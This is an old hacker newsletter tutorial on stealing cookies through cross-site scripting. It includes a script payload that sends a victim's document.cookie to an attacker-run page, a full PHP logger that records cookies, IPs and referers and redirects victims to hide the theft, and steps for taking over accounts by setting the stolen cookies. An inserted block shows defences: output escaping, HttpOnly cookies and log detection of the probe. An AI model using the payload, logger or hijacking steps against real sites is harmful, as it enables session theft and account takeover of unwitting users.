Newsletter Article
Javascript Cookie Stealing and XSS!
By Grindordie

As you all may or may not have heard, "cookie stealing" is when an attacker uses special scripts to steal information from the cookies of another user.

Scenario: When a user logs into a site, some of the time information such as passwords, usernames and many other things is stored in cookies. If you have access to a page on the site that logged the user in, and the user visits your page, you can steal his/her cookies.

How? Well, it's simple. All you need is access to a page on the site where information is logged into the cookie. If you have access to a site like that, you can steal cookies with the following line.
<script>window.location('http://www.mysite/cookie.php?cookie=' + document.cookie)</script>

I don't have access to a page. Can I still "steal cookies"? Well, it depends. You might not have access to a page, but you can find an XSS hole in that site.

What is an XSS hole? XSS stands for cross-site scripting, meaning you are able to use parts of a selected site to attack it, or steal information from it, such as cookies.

Hmm… This sounds interesting, how does XSS work? XSS is mostly found in files that use variables. Let's take a PHP file as an example.
index.php?text=blah…blah

The ?text=blah…blah is a variable. You might see this in guestbooks; sometimes the variable is written into the page. Let's say that in this case index.php?text=blah…blah is writing "blah…blah" into the page. If this works, then you have a perfect XSS hole.

So how do we apply the cookie stealing to this so-called XSS hole? All you have to do is replace the "blah…blah" with the
"<script>window.location('http://www.mysite/cookie.php?cookie=' + document.cookie)</script>"

And now you will have something like this
index.php?text=<script>window.location('http://www.mysite/cookie.php?cookie=' + document.cookie)</script>

or

index.php?text="><script>window.location('http://www.mysite/cookie.php?cookie=' + document.cookie)</script>

The "> part just breaks out of the surrounding HTML the variable lands in and inserts the new code.
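An added example, not part of Grindordie's article, showing the defender's side of the guestbook case above: the page that echoes ?text= unescaped beside an output-encoded version, a session cookie set HttpOnly so document.cookie cannot read it, and a log check that flags the reflected probe in access-log lines. The hostnames, addresses and log lines are constructed for the example.

```python
import html
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# The probe string from the article above, reused here as test input.
PAYLOAD = "<script>window.location('http://www.mysite/cookie.php?cookie=' + document.cookie)</script>"

def render_vulnerable(text: str) -> str:
    """Guestbook page that echoes ?text= as-is: attacker markup becomes live HTML."""
    return f"<p>You wrote: {text}</p>"

def render_safe(text: str) -> str:
    """Same page with output encoding: <, >, &, and quotes become entities, so the
    browser shows the payload as text and never executes it."""
    return f"<p>You wrote: {html.escape(text, quote=True)}</p>"

def session_cookie_header(session_id: str) -> str:
    """HttpOnly keeps the session cookie out of document.cookie, so even a script
    that does run cannot read it; Secure and SameSite reduce exposure further."""
    return f"Set-Cookie: sid={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"

# Constructed Apache-style access-log lines (hypothetical addresses and paths).
SAMPLE_LOG = """\
203.0.113.5 - - [15/Jan/2005:12:52:01 +0000] "GET /index.php?text=hello+world HTTP/1.1" 200 512
203.0.113.9 - - [15/Jan/2005:12:53:10 +0000] "GET /index.php?text=%22%3E%3Cscript%3Ewindow.location(%27http://www.mysite/cookie.php?cookie=%27+%2B+document.cookie)%3C/script%3E HTTP/1.1" 200 611
198.51.100.2 - - [15/Jan/2005:12:54:00 +0000] "GET /about.php HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
SUSPICIOUS = re.compile(r"<script|document\.cookie|javascript:", re.IGNORECASE)

def find_reflected_xss_probes(log_text: str) -> list:
    """Return (client_ip, parameter) for requests whose decoded query string carries
    script markup or a document.cookie reference; decoding twice catches double-encoding."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, url = m.group(1), m.group(2)
        params = parse_qs(urlsplit(url).query, keep_blank_values=True)
        for name, values in params.items():
            if any(SUSPICIOUS.search(unquote_plus(v)) for v in values):
                hits.append((ip, name))
    return hits
```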
WAIT! What is the code that cookie.php has?
```php
<?php
$cookie = $_GET['cookie'];
$ip = getenv('REMOTE_ADDR');
$date = date("j F, Y, g:i a");
$referer = getenv('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header("Location: http://www.google.com/");
?>
```
Ok, now I am going to explain this PHP code.

```php
<?php
// The opening words for any php code
$cookie = $_GET['cookie'];
// It's just setting $_GET['cookie'] to $cookie
$ip = getenv('REMOTE_ADDR');
// It's doing the same thing as above
$date = date("j F, Y, g:i a");
// It's doing the same thing as above
$referer = getenv('HTTP_REFERER');
// It's doing the same thing as above
$fp = fopen('cookies.txt', 'a');
// Here we are setting a variable to a function to open
// the file cookies.txt to write the cookies in.
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
// Here we are writing the Cookie, IP address, Date when it was retrieved,
// and Referer just in case you forget which site it was.
fclose($fp);
// Here we are just closing the file we opened to write the cookies.
header("Location: http://www.google.com/");
// This is really not an important line that is needed..
// But it's used to redirect the victim to google so he/she does not notice
// The line below is the closing of any php file
?>
```
WOW! I got a cookie, now what?
Well, this is one of the easiest steps. Now you go back to the site where your victim got his/her cookie stolen, and replace your cookies with your victim's.
Example. You opened your cookie.txt file and you found something like this:

```
Cookie: username=Grindordie; password=cookie_stealing_script; user_id=1;
IP: 127.0.0.1
Date and Time: 1/15/05 12:52 PM
Referer: http://www.somesite.com/index.php
```
Now you go back to the site your victim got his/her cookie stolen from, in this case http://www.somesite.com/index.php, and you put in your address bar

javascript:alert(document.cookie="username=Grindordie")

and you do the same for the others…

Note: the ; just separates the different pieces of information. javascript:alert(document.cookie="username=Grindordie; password=cookie_stealing_script; user_id=1;") would NOT work; you need to do them one by one.

After you set all your victim's information to yours, you refresh the page and enjoy their stuff.
If you don't have a cookie.txt file in the same folder as your cookie stealing script, AND if the permissions (CHMOD) are not 777, then the cookie will not be recorded into the file.

To make this technique work, you need to have a PHP file with the cookie stealing script and a file named "cookie.txt" with the permissions set to 777.